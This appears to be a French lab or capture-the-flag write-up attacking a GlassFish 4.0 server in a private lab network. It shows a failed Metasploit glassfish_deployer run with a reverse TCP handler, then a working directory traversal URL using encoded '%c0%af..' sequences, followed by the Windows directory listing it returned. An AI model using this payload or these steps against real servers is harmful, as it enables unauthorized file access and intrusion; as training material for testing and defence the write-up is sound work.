Si on utilise le port 8080 de l’adresse IP 192.168.56.102

Untitled

GlassFish Server Credential

Untitled

msf6 exploit(multi/http/glassfish_deployer) > set USERNAME vagrant
USERNAME => vagrant
msf6 exploit(multi/http/glassfish_deployer) > set PASSWORD vagrant
PASSWORD => vagrant
msf6 exploit(multi/http/glassfish_deployer) > exploit

[*] Started reverse TCP handler on 172.30.219.41:4444
[*] Unsupported version:
[*] Glassfish edition:
[*] Trying to login as vagrant:vagrant
[-] Exploit aborted due to failure: no-access: <http://192.168.56.102:4848/> - GlassFish - Failed to authenticate
[*] Exploit completed, but no session was created.

On remarque que la version Glassfish est la 4.0, il y a donc possibilité d’exploiter une vulnérabilité qui est le directory traversal.

Offensive Security's Exploit Database Archive

Le Directory Traversal, également connu sous le nom de Path Traversal ou de ../ (dot-dot-slash), est une technique utilisée pour accéder à des fichiers et dossiers qui ne sont pas censés être accessibles à un utilisateur ou un processus. Elle consiste à utiliser des caractères de séparation de répertoire tels que '/' ou '' et des séquences de caractères comme '..' ou '%2e%2e' pour naviguer au-delà des limites des répertoires autorisés.

Le Directory Traversal peut être utilisé à des fins malveillantes pour accéder à des fichiers sensibles sur un serveur, tels que des fichiers de configuration ou des bases de données. Cela peut être particulièrement dangereux si l'attaque réussit à accéder à des fichiers qui sont exécutables, car cela pourrait permettre à l'attaquant d'exécuter du code sur le serveur. Pour éviter cette attaque, il est important de s'assurer que les fichiers et répertoires sensibles sont correctement protégés et que les entrées de chemin d'accès sont correctement validées pour éviter toute traversée de répertoire non autorisée.

On teste cette vulnérabilité :

<https://192.168.56.102:4848/theme/com%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows> 

Et on obtient ceci :

AppCompat
AppPatch
assembly
bfsvc.exe
Boot
bootstat.dat
Branding
Cursors
debug
diagerr.xml
diagnostics
diagwrn.xml
DigitalLocker
Downloaded Program Files
DtcInstall.log
en-US
explorer.exe
Fonts
fveupdate.exe
Globalization
Help
HelpPane.exe
hh.exe
iis7.log
IME
inf
Installer
L2Schemas
LiveKernelReports
Logs
Media
mib.bin
Microsoft.NET
Migration
ModemLogs
msdfmap.ini
Offline Web Pages
...
...
Panther
PFRO.log
PLA
PolicyDefinitions
regedit.exe
Registration
RemotePackages
rescache
Resources
SchCache
schemas
security
securitynew.sdb
ServerStandard.xml
ServerWeb.xml
ServiceProfiles
servicing
Setup
setupact.log
setuperr.log
SoftwareDistribution
Speech
splwow64.exe
SysMsiCache
system
system.ini
System32
SysWOW64
TAPI
Tasks
Temp
three_of_spades.png
tracing
TSSysprep.log
Vss
Web
win.ini
WindowsShell.Manifest
WindowsUpdate.log
winhlp32.exe
winsxs
write.exe

Cela signifie que l’on peut désormais se promener dans le directory du serveur.